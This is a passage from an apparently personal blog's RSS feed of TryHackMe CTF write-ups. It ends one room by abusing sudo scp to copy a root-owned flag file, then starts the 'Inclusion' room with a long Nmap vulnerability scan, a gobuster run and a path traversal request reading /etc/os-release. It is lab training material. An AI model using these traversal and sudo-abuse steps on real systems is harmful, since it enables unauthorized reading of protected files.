&lt;p&gt;Poking around a bit, &lt;code&gt;sudo -l&lt;/code&gt; reveals that dennis can use scp via sudo, and the test.sh file implies that there’s a /root/flag5.txt file. Since scp works like cp for local copies, we can grab this.&lt;/p&gt;
&lt;figure data-rehype-pretty-code-figure=&quot;&quot;&gt;&lt;pre style=&quot;--shiki-light:#3c3836;--shiki-dark:#ebdbb2;--shiki-light-bg:#f2e5bc;--shiki-dark-bg:#32302f&quot; tabindex=&quot;0&quot; data-language=&quot;bash&quot; data-theme=&quot;gruvbox-light-soft gruvbox-dark-soft&quot;&gt;&lt;code data-language=&quot;bash&quot; data-theme=&quot;gruvbox-light-soft gruvbox-dark-soft&quot; style=&quot;display: grid;&quot;&gt;&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#B57614;--shiki-dark:#FABD2F&quot; data-token-type=&quot;function&quot;&gt;sudo&lt;/span&gt;&lt;span style=&quot;--shiki-light:#79740E;--shiki-dark:#B8BB26&quot; data-token-type=&quot;string&quot;&gt; scp&lt;/span&gt;&lt;span style=&quot;--shiki-light:#79740E;--shiki-dark:#B8BB26&quot; data-token-type=&quot;string&quot;&gt; /root/flag5.txt&lt;/span&gt;&lt;span style=&quot;--shiki-light:#79740E;--shiki-dark:#B8BB26&quot; data-token-type=&quot;string&quot;&gt; .&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#B57614;--shiki-dark:#FABD2F&quot; data-token-type=&quot;function&quot;&gt;cat&lt;/span&gt;&lt;span style=&quot;--shiki-light:#79740E;--shiki-dark:#B8BB26&quot; data-token-type=&quot;string&quot;&gt; flag5.txt&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/figure&gt;
&lt;p&gt;Continuing to poke around, &lt;code&gt;cat .bash_history&lt;/code&gt; reveals the third flag (as well as a lot of scp attempts around /root/flag5.txt, which I just got).&lt;/p&gt;
&lt;p&gt;The ~/.viminfo file reveals two more potential flags: /boot/grub/fonts/flagTwo.txt and /tmp/flagFour.txt.&lt;/p&gt;
&lt;p&gt;But, as the TryHackMe room notes, there is no fourth flag.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Elapsed Time:&lt;/strong&gt; 2 h 53 min&lt;/p&gt; ]]></description>
    <pubDate>Wed, 02 Feb 2022 00:00:00 GMT</pubDate>
  </item><item>
    <title>Inclusion</title>
    <link>https://remarks.delphi-strategy.com/ctfs/2022-02-01</link>
    <guid>https://remarks.delphi-strategy.com/ctfs/2022-02-01</guid>
    <description><![CDATA[ &lt;h1 id=&quot;inclusion&quot;&gt;Inclusion&lt;a role=&quot;anchor&quot; aria-hidden tabindex=&quot;-1&quot; data-no-popover href=&quot;#inclusion&quot; class=&quot;internal internal-link&quot;&gt;&lt;svg width=&quot;18&quot; height=&quot;18&quot; viewBox=&quot;0 0 24 24&quot; fill=&quot;none&quot; stroke=&quot;currentColor&quot; stroke-width=&quot;2&quot; stroke-linecap=&quot;round&quot; stroke-linejoin=&quot;round&quot;&gt;&lt;path d=&quot;M10 13a5 5 0 0 0 7.54.54l3-3a5 5 0 0 0-7.07-7.07l-1.72 1.71&quot;&gt;&lt;/path&gt;&lt;path d=&quot;M14 11a5 5 0 0 0-7.54-.54l-3 3a5 5 0 0 0 7.07 7.07l1.71-1.71&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt;&lt;/h1&gt;
&lt;blockquote class=&quot;callout note&quot; data-callout=&quot;note&quot;&gt;
&lt;div class=&quot;callout-title&quot;&gt;
                  &lt;div class=&quot;callout-icon&quot;&gt;&lt;/div&gt;
                  &lt;div class=&quot;callout-title-inner&quot;&gt;&lt;p&gt;Note&lt;/p&gt;&lt;/div&gt;
                  
                &lt;/div&gt;
&lt;div class=&quot;callout-content&quot;&gt;
&lt;p&gt;&lt;a href=&quot;https://tryhackme.com/room/inclusion&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;“Inclusion” on TryHackMe&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;/blockquote&gt;
&lt;p&gt;This room is intended to focus on local file inclusion attacks, so my guess is that hitting the machine with &lt;a href=&quot;https://nmap.org/&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;Nmap&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt; and &lt;a href=&quot;https://github.com/Oj/gobuster&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;gobuster&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt; is probably unnecessary. But, I’m going to do it anyway, just in case.&lt;/p&gt;
&lt;p&gt;The target is 10.10.0.57. The website running there is basically a shell - most of the links, including the search box, don’t work. No JavaScript is loaded. The only links that &lt;em&gt;do&lt;/em&gt; work are the “View details” buttons underneath the bottom three articles. This calls an /article endpoint with a single parameter, &lt;code&gt;name&lt;/code&gt;. The resulting page looks like someone just dumped a plain text file between the &lt;code&gt;&amp;#x3C;body/&gt;&lt;/code&gt; tags.&lt;/p&gt;
&lt;p&gt;Given the purpose of the room, I’m going to guess they did.&lt;/p&gt;
&lt;p&gt;While it’s probably &lt;em&gt;pro forma&lt;/em&gt;, let’s run our usual &lt;a href=&quot;https://nmap.org/&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;Nmap&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt; scan just in case:&lt;/p&gt;
&lt;figure data-rehype-pretty-code-figure=&quot;&quot;&gt;&lt;pre style=&quot;--shiki-light:#3c3836;--shiki-dark:#ebdbb2;--shiki-light-bg:#f2e5bc;--shiki-dark-bg:#32302f&quot; tabindex=&quot;0&quot; data-language=&quot;bash&quot; data-theme=&quot;gruvbox-light-soft gruvbox-dark-soft&quot;&gt;&lt;code data-language=&quot;bash&quot; data-theme=&quot;gruvbox-light-soft gruvbox-dark-soft&quot; style=&quot;display: grid;&quot;&gt;&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#B57614;--shiki-dark:#FABD2F&quot; data-token-type=&quot;function&quot;&gt;sudo&lt;/span&gt;&lt;span style=&quot;--shiki-light:#79740E;--shiki-dark:#B8BB26&quot; data-token-type=&quot;string&quot;&gt; nmap&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; -v&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; -oA&lt;/span&gt;&lt;span style=&quot;--shiki-light:#79740E;--shiki-dark:#B8BB26&quot; data-token-type=&quot;string&quot;&gt; inclusion&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; -Pn&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; -A&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; -T4&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; -sS&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; -script&lt;/span&gt;&lt;span style=&quot;--shiki-light:#79740E;--shiki-dark:#B8BB26&quot; data-token-type=&quot;string&quot;&gt; vuln&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;string&quot;&gt; \&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt;          -p-&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; 10.10.0.57&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/figure&gt;
&lt;p&gt;This gives the following output:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;# Nmap 7.92 scan initiated Tue Feb  1 18:58:37 2022 as: nmap -v -oA inclusion -Pn -A -T4 -sS -script vuln -p- 10.10.0.57
Pre-scan script results:
|_broadcast-avahi-dos: ERROR: Script execution failed (use -d to debug)
Nmap scan report for 10.10.0.57
Host is up (0.14s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| vulners:
|   cpe:/a:openbsd:openssh:7.6p1:
|     	MSF:ILITIES/UBUNTU-CVE-2019-6111/	5.8	https://vulners.com/metasploit/MSF:ILITIES/UBUNTU-CVE-2019-6111/	*EXPLOIT*
|     	MSF:ILITIES/SUSE-CVE-2019-6111/	5.8	https://vulners.com/metasploit/MSF:ILITIES/SUSE-CVE-2019-6111/	*EXPLOIT*
|     	MSF:ILITIES/SUSE-CVE-2019-25017/	5.8	https://vulners.com/metasploit/MSF:ILITIES/SUSE-CVE-2019-25017/	*EXPLOIT*
|     	MSF:ILITIES/REDHAT_LINUX-CVE-2019-6111/	5.8	https://vulners.com/metasploit/MSF:ILITIES/REDHAT_LINUX-CVE-2019-6111/	*EXPLOIT*
|     	MSF:ILITIES/REDHAT-OPENSHIFT-CVE-2019-6111/	5.8	https://vulners.com/metasploit/MSF:ILITIES/REDHAT-OPENSHIFT-CVE-2019-6111/	*EXPLOIT*
|     	MSF:ILITIES/ORACLE-SOLARIS-CVE-2019-6111/	5.8	https://vulners.com/metasploit/MSF:ILITIES/ORACLE-SOLARIS-CVE-2019-6111/	*EXPLOIT*
|     	MSF:ILITIES/OPENBSD-OPENSSH-CVE-2019-6111/	5.8	https://vulners.com/metasploit/MSF:ILITIES/OPENBSD-OPENSSH-CVE-2019-6111/	*EXPLOIT*
|     	MSF:ILITIES/IBM-AIX-CVE-2019-6111/	5.8	https://vulners.com/metasploit/MSF:ILITIES/IBM-AIX-CVE-2019-6111/	*EXPLOIT*
|     	MSF:ILITIES/HUAWEI-EULEROS-2_0_SP8-CVE-2019-6111/	5.8	https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP8-CVE-2019-6111/	*EXPLOIT*
|     	MSF:ILITIES/HUAWEI-EULEROS-2_0_SP5-CVE-2019-6111/	5.8	https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP5-CVE-2019-6111/	*EXPLOIT*
|     	MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2019-6111/	5.8	https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2019-6111/	*EXPLOIT*
|     	MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2019-6111/	5.8	https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2019-6111/	*EXPLOIT*
|     	MSF:ILITIES/GENTOO-LINUX-CVE-2019-6111/	5.8	https://vulners.com/metasploit/MSF:ILITIES/GENTOO-LINUX-CVE-2019-6111/	*EXPLOIT*
|     	MSF:ILITIES/F5-BIG-IP-CVE-2019-6111/	5.8	https://vulners.com/metasploit/MSF:ILITIES/F5-BIG-IP-CVE-2019-6111/	*EXPLOIT*
|     	MSF:ILITIES/DEBIAN-CVE-2019-6111/	5.8	https://vulners.com/metasploit/MSF:ILITIES/DEBIAN-CVE-2019-6111/	*EXPLOIT*
|     	MSF:ILITIES/CENTOS_LINUX-CVE-2019-6111/	5.8	https://vulners.com/metasploit/MSF:ILITIES/CENTOS_LINUX-CVE-2019-6111/	*EXPLOIT*
|     	MSF:ILITIES/AMAZON_LINUX-CVE-2019-6111/	5.8	https://vulners.com/metasploit/MSF:ILITIES/AMAZON_LINUX-CVE-2019-6111/	*EXPLOIT*
|     	MSF:ILITIES/AMAZON-LINUX-AMI-2-CVE-2019-6111/	5.8	https://vulners.com/metasploit/MSF:ILITIES/AMAZON-LINUX-AMI-2-CVE-2019-6111/	*EXPLOIT*
|     	MSF:ILITIES/ALPINE-LINUX-CVE-2019-6111/	5.8	https://vulners.com/metasploit/MSF:ILITIES/ALPINE-LINUX-CVE-2019-6111/	*EXPLOIT*
|     	EXPLOITPACK:98FE96309F9524B8C84C508837551A19	5.8	https://vulners.com/exploitpack/EXPLOITPACK:98FE96309F9524B8C84C508837551A19	*EXPLOIT*
|     	EXPLOITPACK:5330EA02EBDE345BFC9D6DDDD97F9E97	5.8	https://vulners.com/exploitpack/EXPLOITPACK:5330EA02EBDE345BFC9D6DDDD97F9E97	*EXPLOIT*
|     	EDB-ID:46516	5.8	https://vulners.com/exploitdb/EDB-ID:46516	*EXPLOIT*
|     	EDB-ID:46193	5.8	https://vulners.com/exploitdb/EDB-ID:46193	*EXPLOIT*
|     	CVE-2019-6111	5.8	https://vulners.com/cve/CVE-2019-6111
|     	1337DAY-ID-32328	5.8	https://vulners.com/zdt/1337DAY-ID-32328	*EXPLOIT*
|     	1337DAY-ID-32009	5.8	https://vulners.com/zdt/1337DAY-ID-32009	*EXPLOIT*
|     	SSH_ENUM	5.0	https://vulners.com/canvas/SSH_ENUM	*EXPLOIT*
|     	PACKETSTORM:150621	5.0	https://vulners.com/packetstorm/PACKETSTORM:150621	*EXPLOIT*
|     	MSF:AUXILIARY/SCANNER/SSH/SSH_ENUMUSERS	5.0	https://vulners.com/metasploit/MSF:AUXILIARY/SCANNER/SSH/SSH_ENUMUSERS	*EXPLOIT*
|     	EXPLOITPACK:F957D7E8A0CC1E23C3C649B764E13FB0	5.0	https://vulners.com/exploitpack/EXPLOITPACK:F957D7E8A0CC1E23C3C649B764E13FB0	*EXPLOIT*
|     	EXPLOITPACK:EBDBC5685E3276D648B4D14B75563283	5.0	https://vulners.com/exploitpack/EXPLOITPACK:EBDBC5685E3276D648B4D14B75563283	*EXPLOIT*
|     	EDB-ID:45939	5.0	https://vulners.com/exploitdb/EDB-ID:45939	*EXPLOIT*
|     	EDB-ID:45233	5.0	https://vulners.com/exploitdb/EDB-ID:45233	*EXPLOIT*
|     	CVE-2018-15919	5.0	https://vulners.com/cve/CVE-2018-15919
|     	CVE-2018-15473	5.0	https://vulners.com/cve/CVE-2018-15473
|     	1337DAY-ID-31730	5.0	https://vulners.com/zdt/1337DAY-ID-31730	*EXPLOIT*
|     	CVE-2021-41617	4.4	https://vulners.com/cve/CVE-2021-41617
|     	MSF:ILITIES/OPENBSD-OPENSSH-CVE-2020-14145/	4.3	https://vulners.com/metasploit/MSF:ILITIES/OPENBSD-OPENSSH-CVE-2020-14145/	*EXPLOIT*
|     	MSF:ILITIES/HUAWEI-EULEROS-2_0_SP9-CVE-2020-14145/	4.3	https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP9-CVE-2020-14145/	*EXPLOIT*
|     	MSF:ILITIES/HUAWEI-EULEROS-2_0_SP8-CVE-2020-14145/	4.3	https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP8-CVE-2020-14145/	*EXPLOIT*
|     	MSF:ILITIES/HUAWEI-EULEROS-2_0_SP5-CVE-2020-14145/	4.3	https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP5-CVE-2020-14145/	*EXPLOIT*
|     	MSF:ILITIES/F5-BIG-IP-CVE-2020-14145/	4.3	https://vulners.com/metasploit/MSF:ILITIES/F5-BIG-IP-CVE-2020-14145/	*EXPLOIT*
|     	CVE-2020-14145	4.3	https://vulners.com/cve/CVE-2020-14145
|     	CVE-2019-6110	4.0	https://vulners.com/cve/CVE-2019-6110
|     	CVE-2019-6109	4.0	https://vulners.com/cve/CVE-2019-6109
|     	CVE-2018-20685	2.6	https://vulners.com/cve/CVE-2018-20685
|     	PACKETSTORM:151227	0.0	https://vulners.com/packetstorm/PACKETSTORM:151227	*EXPLOIT*
|_    	1337DAY-ID-30937	0.0	https://vulners.com/zdt/1337DAY-ID-30937	*EXPLOIT*
80/tcp open  http    Werkzeug httpd 0.16.0 (Python 3.6.9)
| http-slowloris-check:
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server&#039;s resources causing Denial Of Service.
|
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-dombased-xss: Couldn&#039;t find any DOM based XSS.
|_http-server-header: Werkzeug/0.16.0 Python/3.6.9
|_http-csrf: Couldn&#039;t find any CSRF vulnerabilities.
| http-fileupload-exploiter:
|
|_    Couldn&#039;t find a file-type field.
|_http-stored-xss: Couldn&#039;t find any stored XSS vulnerabilities.
| vulners:
|   cpe:/a:python:python:3.6.9:
|     	CVE-2021-3177	7.5	https://vulners.com/cve/CVE-2021-3177
|     	CVE-2020-27619	7.5	https://vulners.com/cve/CVE-2020-27619
|     	CVE-2020-8492	7.1	https://vulners.com/cve/CVE-2020-8492
|     	CVE-2020-26116	6.4	https://vulners.com/cve/CVE-2020-26116
|     	MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2019-16056/	5.0	https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2019-16056/	*EXPLOIT*
|     	CVE-2019-9636	5.0	https://vulners.com/cve/CVE-2019-9636
|     	CVE-2019-16056	5.0	https://vulners.com/cve/CVE-2019-16056
|     	CVE-2018-20852	5.0	https://vulners.com/cve/CVE-2018-20852
|     	CVE-2018-20406	5.0	https://vulners.com/cve/CVE-2018-20406
|     	CVE-2018-1060	5.0	https://vulners.com/cve/CVE-2018-1060
|     	MSF:ILITIES/SUSE-CVE-2020-14422/	4.3	https://vulners.com/metasploit/MSF:ILITIES/SUSE-CVE-2020-14422/	*EXPLOIT*
|     	MSF:ILITIES/ORACLE-SOLARIS-CVE-2020-8315/	4.3	https://vulners.com/metasploit/MSF:ILITIES/ORACLE-SOLARIS-CVE-2020-8315/	*EXPLOIT*
|     	CVE-2021-28359	4.3	https://vulners.com/cve/CVE-2021-28359
|     	CVE-2020-8315	4.3	https://vulners.com/cve/CVE-2020-8315
|     	CVE-2020-14422	4.3	https://vulners.com/cve/CVE-2020-14422
|     	CVE-2019-9947	4.3	https://vulners.com/cve/CVE-2019-9947
|     	CVE-2019-9740	4.3	https://vulners.com/cve/CVE-2019-9740
|     	CVE-2019-18348	4.3	https://vulners.com/cve/CVE-2019-18348
|     	CVE-2019-16935	4.3	https://vulners.com/cve/CVE-2019-16935
|     	CVE-2021-23336	4.0	https://vulners.com/cve/CVE-2021-23336
|     	MSF:ILITIES/DEBIAN-CVE-2021-3426/	2.7	https://vulners.com/metasploit/MSF:ILITIES/DEBIAN-CVE-2021-3426/	*EXPLOIT*
|_    	CVE-2021-3426	2.7	https://vulners.com/cve/CVE-2021-3426
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=2/1%OT=22%CT=1%CU=40063%PV=Y%DS=4%DC=T%G=Y%TM=61F9EB2E
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=102%TI=Z%CI=Z%TS=A)OPS(O1=M5
OS:06ST11NW7%O2=M506ST11NW7%O3=M506NNT11NW7%O4=M506ST11NW7%O5=M506ST11NW7%O
OS:6=M506ST11)WIN(W1=F4B3%W2=F4B3%W3=F4B3%W4=F4B3%W5=F4B3%W6=F4B3)ECN(R=Y%D
OS:F=Y%T=40%W=F507%O=M506NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0
OS:%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=
OS:Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%
OS:RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%I
OS:PL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Uptime guess: 48.616 days (since Wed Dec 15 04:37:20 2021)
Network Distance: 4 hops
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 8888/tcp)
HOP RTT       ADDRESS
1   38.25 ms  10.13.0.1
2   ... 3
4   170.72 ms 10.10.0.57

Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Feb  1 19:23:42 2022 -- 1 IP address (1 host up) scanned in 1505.56 seconds
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So, we’ve got a Linux box running SSH and some weird-ass httpd server on port 80.&lt;/p&gt;
&lt;p&gt;We’ll also hit 10.10.0.57 with &lt;a href=&quot;https://github.com/Oj/gobuster&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;gobuster&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt;:&lt;/p&gt;
&lt;figure data-rehype-pretty-code-figure=&quot;&quot;&gt;&lt;pre style=&quot;--shiki-light:#3c3836;--shiki-dark:#ebdbb2;--shiki-light-bg:#f2e5bc;--shiki-dark-bg:#32302f&quot; tabindex=&quot;0&quot; data-language=&quot;bash&quot; data-theme=&quot;gruvbox-light-soft gruvbox-dark-soft&quot;&gt;&lt;code data-language=&quot;bash&quot; data-theme=&quot;gruvbox-light-soft gruvbox-dark-soft&quot; style=&quot;display: grid;&quot;&gt;&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#B57614;--shiki-dark:#FABD2F&quot; data-token-type=&quot;function&quot;&gt;gobuster&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;string&quot;&gt; \&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt;	-t&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; 50&lt;/span&gt;&lt;span style=&quot;--shiki-light:#79740E;--shiki-dark:#B8BB26&quot; data-token-type=&quot;string&quot;&gt; dir&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;string&quot;&gt; \&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt;	-u&lt;/span&gt;&lt;span style=&quot;--shiki-light:#79740E;--shiki-dark:#B8BB26&quot; data-token-type=&quot;string&quot;&gt; http://10.10.0.57&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;string&quot;&gt; \&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt;	-w&lt;/span&gt;&lt;span style=&quot;--shiki-light:#79740E;--shiki-dark:#B8BB26&quot; data-token-type=&quot;string&quot;&gt; /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/figure&gt;
&lt;p&gt;This only detects the /article endpoint I noted while poking around the site. (I could hit the site with a larger wordlist, but it doesn’t seem worth it.)&lt;/p&gt;
&lt;p&gt;I’m going to go out on a limb here and guess that we’re going to exploit the /article endpoint, which probably &lt;em&gt;is&lt;/em&gt; just pulling in files verbatim.&lt;/p&gt;
&lt;p&gt;A common file on Linux systems is /etc/os-release, so let’s see if we can include this. And, in fact, after a little experimentation it turns out that we can using &lt;code&gt;http://10.10.0.57/article?name=../../../etc/os-release&lt;/code&gt;:&lt;/p&gt;
&lt;figure data-rehype-pretty-code-figure=&quot;&quot;&gt;&lt;pre style=&quot;--shiki-light:#3c3836;--shiki-dark:#ebdbb2;--shiki-light-bg:#f2e5bc;--shiki-dark-bg:#32302f&quot; tabindex=&quot;0&quot; data-language=&quot;bash&quot; data-theme=&quot;gruvbox-light-soft gruvbox-dark-soft&quot;&gt;&lt;code data-language=&quot;bash&quot; data-theme=&quot;gruvbox-light-soft gruvbox-dark-soft&quot; style=&quot;display: grid;&quot;&gt;&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#076678;--shiki-dark:#83A598&quot; data-token-type=&quot;normal&quot;&gt;NAME&lt;/span&gt;&lt;span style=&quot;--shiki-light:#427B58;--shiki-dark:#8EC07C&quot; data-token-type=&quot;operator&quot;&gt;=&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;string&quot;&gt;&quot;&lt;/span&gt;&lt;span style=&quot;--shiki-light:#79740E;--shiki-dark:#B8BB26&quot; data-token-type=&quot;string&quot;&gt;Ubuntu&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;string&quot;&gt;&quot;&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;;&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#076678;--shiki-dark:#83A598&quot; data-token-type=&quot;normal&quot;&gt;VERSION&lt;/span&gt;&lt;span style=&quot;--shiki-light:#427B58;--shiki-dark:#8EC07C&quot; data-token-type=&quot;operator&quot;&gt;=&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;string&quot;&gt;&quot;&lt;/span&gt;&lt;span style=&quot;--shiki-light:#79740E;--shiki-dark:#B8BB26&quot; data-token-type=&quot;string&quot;&gt;18.04.3 LTS (Bionic Beaver)&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;string&quot;&gt;&quot;&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;;&lt;/span&gt;&lt;/span&gt;
